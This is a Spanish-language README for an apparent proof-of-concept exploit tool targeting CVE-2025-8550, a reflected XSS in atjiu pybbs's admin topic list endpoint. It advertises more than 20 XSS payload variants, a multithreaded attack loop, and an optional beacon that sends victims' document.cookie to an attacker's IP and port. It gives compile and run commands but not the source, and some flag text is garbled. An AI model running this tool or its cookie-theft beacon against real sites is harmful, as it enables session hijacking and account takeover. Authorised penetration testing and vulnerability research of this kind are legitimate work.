
# Exploit automatizado de Prueba de Concepto para CVE-2025-8550, un XSS reflejado en atjiu pybbs. Incluye más de 20 variaciones de payload, exfiltración de cookies, multihilo y CLI personalizable para pruebas de penetración.
Este repositorio alberga un exploit automatizado de Prueba de Concepto (PoC) para CVE-2025-8550, una vulnerabilidad de Cross‑Site Scripting (XSS) reflejado en atjiu pybbs (≤ v6.0.0). Ataca el parámetro username del endpoint /admin/topic/list, el cual carece de una adecuada sanitización de entrada.
Más de 20 variantes de payload: script, SVG, iframe, object, manejadores onerror y más.
Codificación automática de URL: asegura una inyección segura mediante curl_easy_escape de libcurl.
Exfiltración de cookies (opcional): inyección de un beacon para enviar document.cookie a un servidor controlado por el atacante.
Multihilo: utiliza pthreads para paralelizar los intentos y acelerar las pruebas.
CLI personalizable: impulsado por , permite especificar:
argparse-u / --url)-c / --cookies)-k / --cokpay))-i / --ip, -p / --port)-v / --verbose)# Compilar el binario del exploit
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread
# Ejecutar contra el objetivo
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]
#ENVÍO DE COOKIES :
./CVE-2025-8550 -u http://TARGET -i <TU_IP> -p <TU_PUERTO> -v [MODO_VERBOSO] -k [PAYLOAD_COOKIE]
http://<TARGET> con tu instancia de atjiu pybbs.-k para habilitar el beacon de robo de cookies (requiere -i y -p).-c si no se necesitan cookies de autenticación.Licencia MIT